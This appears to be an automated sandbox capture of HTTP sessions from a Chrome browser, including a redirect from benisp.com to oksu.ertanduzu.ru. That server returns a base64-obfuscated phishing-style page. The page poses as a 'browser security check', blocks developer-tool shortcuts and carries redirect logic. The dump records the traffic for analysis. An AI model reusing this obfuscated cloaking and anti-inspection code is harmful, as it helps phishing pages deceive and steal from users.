                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 6c 67 63 39 5a 76 42 53 4f 77 39 5a 44 4c 67 78 74 61 66 74 7a 4c 67 41 46 69 41 4e 38 76 30 62 51 69 74 6d 6c 6e 75 35 34 38 6c 76 41 31 6d 79 4b 57 35 39 44 6d 51 49 48 45 35 34 50 49 7a 68 48 6d 4e 7a 69 41 6b 6f 47 4c 7a 44 58 54 38 2f 34 45 35 30 6d 4a 61 6f 7a 59 71 39 58 53 37 57 44 5a 51 69 57 35 61 66 48 74 73 38 74 6c 6b 35 6e 75 78 32 67 31 2b 37 71 39 37 58 44 63 53 6c 52 68 67 35 32 61 76 6a 62 2f 38 6d 52 63 31 44 4b 41 32 72 66 73 48 41 44 41 68 44 4d 6f 50 64 70 68 31 6e 48 4f 2b 79 4d 57 68 6c 62 72 4c 7a 58 58 57 4e 77 4e 51 41 65 50 57 33 42 7a 2b 32 6b 77 76 5a 4b 2f 74 42 59 52 72 47 52 76 59 6d 4f 44 6a 34 70 49 6e 6e 78 7a 59 43 7a 56 50 32 58 50 56 36 39 37 33 35 64 74 77 38 34 4f 51 48 46 77 2f 6b 55 38 4c 2f 6c 6a 67 55 2f 42 7a
                                                                                                                                                                                                                                                Data Ascii: lgc9ZvBSOw9ZDLgxtaftzLgAFiAN8v0bQitmlnu548lvA1myKW59DmQIHE54PIzhHmNziAkoGLzDXT8/4E50mJaozYq9XS7WDZQiW5afHts8tlk5nux2g1+7q97XDcSlRhg52avjb/8mRc1DKA2rfsHADAhDMoPdph1nHO+yMWhlbrLzXXWNwNQAePW3Bz+2kwvZK/tBYRrGRvYmODj4pInnxzYCzVP2XPV69735dtw84OQHFw/kU8L/ljgU/Bz
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 34 41 38 6f 67 5a 62 6c 62 50 61 45 6b 6a 74 54 6a 72 35 6a 71 65 5a 67 50 38 4c 36 6b 31 78 30 62 46 42 49 74 58 69 71 62 64 7a 6c 65 45 70 31 38 4e 54 32 71 44 70 76 39 32 42 47 35 48 70 44 6e 57 4a 33 7a 64 4f 38 39 2b 6d 38 54 2f 54 41 55 72 70 72 55 75 7a 50 5a 2f 30 76 64 79 55 39 4a 34 77 52 32 6a 74 69 72 34 70 7a 32 47 76 6f 39 2b 52 4d 38 2b 6d 7a 6a 69 65 34 38 78 67 33 49 6d 53 6c 31 78 64 35 61 36 4c 59 52 47 76 4d 2b 4d 57 79 4f 36 55 46 33 30 50 69 68 74 64 61 32 75 43 63 4d 2b 53 35 65 61 6a 4f 77 57 6c 4c 61 48 34 4a 75 45 59 54 4b 41 53 63 56 50 4d 51 56 55 76 57 61 73 30 32 74 34 32 4b 55 67 64 66 31 78 34 51 65 39 31 30 6e 55 2f 47 5a 66 36 78 48 72 6a 66 6a 7a 78 77 67 55 48 55 4e 58 65 37 6b 75 69 6a 79 74 33 6f 48 76 45 65 31 2f 55
                                                                                                                                                                                                                                                Data Ascii: 4A8ogZblbPaEkjtTjr5jqeZgP8L6k1x0bFBItXiqbdzleEp18NT2qDpv92BG5HpDnWJ3zdO89+m8T/TAUrprUuzPZ/0vdyU9J4wR2jtir4pz2Gvo9+RM8+mzjie48xg3ImSl1xd5a6LYRGvM+MWyO6UF30Pihtda2uCcM+S5eajOwWlLaH4JuEYTKAScVPMQVUvWas02t42KUgdf1x4Qe910nU/GZf6xHrjfjzxwgUHUNXe7kuijyt3oHvEe1/U
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 71 65 36 71 44 72 72 56 79 66 79 69 2b 47 66 65 2f 61 58 44 2f 2f 6a 33 66 33 47 64 6f 46 38 42 70 64 43 6e 57 36 4d 4a 33 78 51 56 78 32 48 70 50 75 62 66 46 37 75 42 31 39 42 65 4b 38 65 59 30 52 47 35 51 37 4d 69 66 77 37 49 72 44 65 76 6f 57 62 46 57 67 62 72 73 42 58 62 57 49 72 2f 39 66 30 43 32 6d 73 75 78 77 4d 31 75 69 78 71 59 77 36 4b 6d 65 42 4c 31 2b 7a 4b 6d 64 51 56 54 6f 73 33 66 4d 47 50 6c 79 79 64 64 47 6c 4d 77 48 44 35 6e 4c 4d 71 59 48 5a 5a 56 71 66 31 46 41 77 37 4c 75 36 43 37 39 33 35 4a 39 4b 70 42 59 6e 55 63 63 44 7a 36 54 4b 75 61 32 68 38 57 56 75 2f 56 6e 7a 70 63 50 37 5a 33 63 71 73 65 30 6d 66 6a 50 62 39 57 77 37 4f 70 53 37 69 66 47 36 6b 77 48 36 79 46 42 4e 50 31 4f 7a 34 5a 44 6e 65 33 76 47 79 57 48 50 62 75 2b 56
                                                                                                                                                                                                                                                Data Ascii: qe6qDrrVyfyi+Gfe/aXD//j3f3GdoF8BpdCnW6MJ3xQVx2HpPubfF7uB19BeK8eY0RG5Q7Mifw7IrDevoWbFWgbrsBXbWIr/9f0C2msuxwM1uixqYw6KmeBL1+zKmdQVTos3fMGPlyyddGlMwHD5nLMqYHZZVqf1FAw7Lu6C7935J9KpBYnUccDz6TKua2h8WVu/VnzpcP7Z3cqse0mfjPb9Ww7OpS7ifG6kwH6yFBNP1Oz4ZDne3vGyWHPbu+V


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                46192.168.2.1149826192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC433OUTGET /c.gif?u=https%3A%2F%2Fbenisp.com%2Fdan%2Fdann%2Fdannn&r=&b=240074490&p=22&rand=0.1339836907307579 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:47 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:46 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:47 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                47192.168.2.1149824192.185.195.2034436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:47 UTC590OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                Host: benisp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://benisp.com/dan/dann/dannn
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:47 UTC195INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:47 GMT
                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                48192.168.2.1149831192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:47 UTC1011OUTPOST /boom.gif?bilmur=1&batcache_hit=0&provider=wordpress.com&service=simple&rtt=450&downlink=1250&site_host=dnearymedahealthstaffing.wordpress.com&site_path=%2Fmedahealthstaffing-proposal%2F&version=4.0.0&nt=2--____3_1s_9s_9s_19m_9s_1a2_1o2_20i_1o9_4zl_53d_53k_7px_7py_7q1--0_0_0--http%2F1.1&reporter=sendBeacon&fcp=4451&fcp_raw=4451&fp_raw=4451&lcp=4812&lcp_raw=4812&cls=0&ttfb=2161&nav_type=navigate&inp=8 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:47 UTC185INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:47 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                49192.168.2.1149860172.67.134.2314436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:58 UTC704OUTGET /gk59Agp/ HTTP/1.1
                                                                                                                                                                                                                                                Host: oksu.ertanduzu.ru
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                Referer: https://benisp.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:59 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FrJNO8PE6pSIvPqi%2FQocYgfjuxN2DAry0%2FWtfIwutsKNlad7M3zUUiUw%2Fzec1qZnLj4E8YzILohAPZwPvpP%2BpHHfR54gxQ6LepcmmlDdmgCDPotlNMZSlMlcJGwScg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1095&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1606&delivery_rate=2600913&cwnd=252&unsent_bytes=0&cid=5135f3ac09efefe8&ts=258&x=0"
                                                                                                                                                                                                                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6IkdkRDR6TmdqSjdvU1Aweml3MHIyUVE9PSIsInZhbHVlIjoiazh6MWQvSWo4OUtjN2IyZ1h0VlN2TnMxS1VLTkt6WDVLQmhaWjJ5N0NJdzRncHFPc0R2VHJwc2FoUVNsblVVVURsSm4rR3YwdkJaS3Q2MCtxVHdHaTA4T2l3K1FyMTJvdHZWYUpTVXZ1WmUybXZvU2ZPNlpMM284TUxQUWxacjciLCJtYWMiOiIzNmVlZjllNDM3OGY5OGZjZDYwMDE0NThiMWFjMWI5Mzg0ODQzMGJmOWJlMzY0NjI3YWExNzI4MWVhOWU4ZmE1IiwidGFnIjoiIn0%3D; expires=Fri, 20-Dec-2024 17:45:59 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 55 76 51 69 38 7a 56 6b 35 43 54 58 64 51 65 55 52 33 61 46 52 47 4e 6a 41 79 4e 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 48 5a 52 5a 33 4e 7a 65 44 42 79 51 54 4a 70 57 47 55 76 59 57 39 74 4e 43 39 47 56 44 5a 47 63 69 39 68 4e 47 74 57 5a 31 68 68 53 45 31 69 64 33 56 78 51 33 52 69 4c 32 4a 61 4c 30 70 6c 56 55 52 48 57 56 42 73 63 54 52 34 4d 54 68 58 51 57 35 61 4e 47 78 51 54 46 42 59 59 57 56 76 62 31 4e 6f 51 6d 68 50 54 6e 56 36 51 6b 31 47 4e 6d 6c 7a 54 48 4a 58 5a 79 74 6b 63 45 67 31 65 53 74 34 4e 6e 4e 30 55 6b 31 79 56 55 5a 31 61 31 59 79 63 6e 4e 77 5a 33 52 31 59 33 45 31 54 6c 51 77 55 6b 56 79 4d 31 6f
                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlUvQi8zVk5CTXdQeUR3aFRGNjAyN2c9PSIsInZhbHVlIjoiaHZRZ3NzeDByQTJpWGUvYW9tNC9GVDZGci9hNGtWZ1hhSE1id3VxQ3RiL2JaL0plVURHWVBscTR4MThXQW5aNGxQTFBYYWVvb1NoQmhPTnV6Qk1GNmlzTHJXZytkcEg1eSt4NnN0Uk1yVUZ1a1YycnNwZ3R1Y3E1TlQwUkVyM1o
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 34 64 62 37 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 77 68 65 72 65 20 70 72 65 70 61 72 61 74 69 6f 6e 20 61 6e 64 20 6f 70 70 6f 72 74 75 6e 69 74 79 20 6d 65 65 74 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 76 53 33 4e 56 4c 6d 56 79 64 47 46 75 5a 48 56 36 64 53 35 79 64 53 39 6e 61 7a 55 35 51 57 64 77 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69
                                                                                                                                                                                                                                                Data Ascii: 4db7<script>/* Success is where preparation and opportunity meet. */if(atob("aHR0cHM6Ly9vS3NVLmVydGFuZHV6dS5ydS9nazU5QWdwLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCi
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4e 6a 56 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 31 6c 74 5a 6b 4e
                                                                                                                                                                                                                                                Data Ascii: Y2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNjVweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI1ltZkN
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32
                                                                                                                                                                                                                                                Data Ascii: XZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 4e 76 62 6e 4e 30 49 47 4e 69 62 6d 39 55 53 32 70 4d 5a 47 59 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 47 4e 69 62 6d 39 55 53 32 70 4d 5a 47 59 67 4c 53 42 7a 53 56 52 74 64 6d 56 43 55 46 5a 4b 49 44 34 67 52 46 6c 78 62 32 39 32 59 6e 52 7a 62 79 41 6d 4a 69 41 68 63 58 42 79 64 56 56 6d 5a 57 5a 4b 54 69 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 57 46 5a 47 55 57 68 6c 55 48 52 70 51 69 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 78 63 48 4a 31 56 57 5a 6c 5a 6b 70 4f 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62
                                                                                                                                                                                                                                                Data Ascii: NvbnN0IGNibm9US2pMZGYgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKGNibm9US2pMZGYgLSBzSVRtdmVCUFZKID4gRFlxb292YnRzbyAmJiAhcXBydVVmZWZKTikgew0KICAgICAgICAgICAgWFZGUWhlUHRpQiA9IHRydWU7DQogICAgICAgICAgICBxcHJ1VWZlZkpOID0gdHJ1ZTsNCiAgICAgICAgICAgIHdpbmRvdy5sb
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6c 46 35 63 55 35 73 65 55 64 6f 5a 45 4d 69 50 67 30 4b 53 57 35 70 64 47 6c 68 64 47 6c 75 5a 79 42 69 63 6d 39 33 63 32 56 79 49 48 4e 6c 59 33 56 79 61 58 52 35 49 47 4e 6f 5a 57 4e 72 63 79 42 6d 62 33 49 67 65 57 39 31 63 69 42 77 63 6d 39 30 5a 57 4e 30 61 57 39 75 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58
                                                                                                                                                                                                                                                Data Ascii: ibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9IlF5cU5seUdoZEMiPg0KSW5pdGlhdGluZyBicm93c2VyIHNlY3VyaXR5IGNoZWNrcyBmb3IgeW91ciBwcm90ZWN0aW9uLg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaX
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 4b 48 42 77 54 6c 68 68 5a 6c 64 68 65 57 34 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32 4e 6c 63 33 4d 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 57 46 5a 47 55 57 68 6c 55 48 52 70 51 69 41 39 50 53 42 6d 59 57 78 7a 5a 53 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 78 76 59 32 46 30 61 57 39 75 4c 6e 4a
                                                                                                                                                                                                                                                Data Ascii: KHBwTlhhZldheW4pDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2Nlc3MnKXsNCiAgICAgICAgaWYoWFZGUWhlUHRpQiA9PSBmYWxzZSl7DQogICAgICAgIGxvY2F0aW9uLnJ
                                                                                                                                                                                                                                                2024-12-20 15:45:59 UTC1369INData Raw: 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 48 46 67 53 65 69 4c 65 62 5a 20 3f 20 55 52 71 58 66 72 51 5a 45 6b 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 55 52 71 58 66 72 51 5a 45 6b 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 71 43 70 4c 74 42 69 77 61 45 20 3d 3d 20 48 46 67 53 65 69 4c 65 62 5a 29 7b 0d 0a 63 6f 6e 73 74 20 48 6c 43 71 74 50 69 51 4b 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 55 52 71 58 66 72 51 5a 45 6b 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 55
                                                                                                                                                                                                                                                Data Ascii: hostname === HFgSeiLebZ ? URqXfrQZEk.hostname : URqXfrQZEk.hostname.split('.').slice(-2).join('.');if(qCpLtBiwaE == HFgSeiLebZ){const HlCqtPiQKf = window.location.pathname.split('%23')[0].split('%3F')[0];if (URqXfrQZEk.pathname.endsWith('/')) {U
